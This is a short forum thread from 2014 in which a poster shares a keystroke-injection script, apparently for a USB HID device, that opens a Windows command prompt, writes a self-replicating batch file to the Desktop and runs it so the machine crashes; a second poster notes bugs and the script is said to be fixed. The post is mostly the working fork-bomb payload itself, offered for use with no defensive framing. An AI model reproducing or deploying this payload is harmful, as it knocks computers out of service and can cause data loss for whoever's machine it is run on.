3699n Posted April 27, 2014 Share Posted April 27, 2014 (edited) This a windows fork bomb. When the script gets run it creates a batch file which continuously starts its self until the computer crashes. DELAY 3000GUI RDELAY 500STRING cmd.exeDELAY 1000ENTERDELAY 1000STRING cd DesktopENTERSTRING copy con forkbomb.batENTERSTRING @echo offENTERSTRING :startCTRL-SDELAY 500STRING start forkbomb.batENTER STRING goto start ENTER CTRL-Z ENTER STRING forkbomb.bat ENTERALT-F4 Edited April 28, 2014 by 3699n Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted April 27, 2014 Share Posted April 27, 2014 (edited) There's a few problems, seeing as this script won't actually work. You should open CMD, use copy con to write out a file and name it properly (in the above, the file would actually be saved as forkbomb.bat.txt), then run the batch file through the command line. UPDATE: code fixed. Edited April 28, 2014 by Xcellerator Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.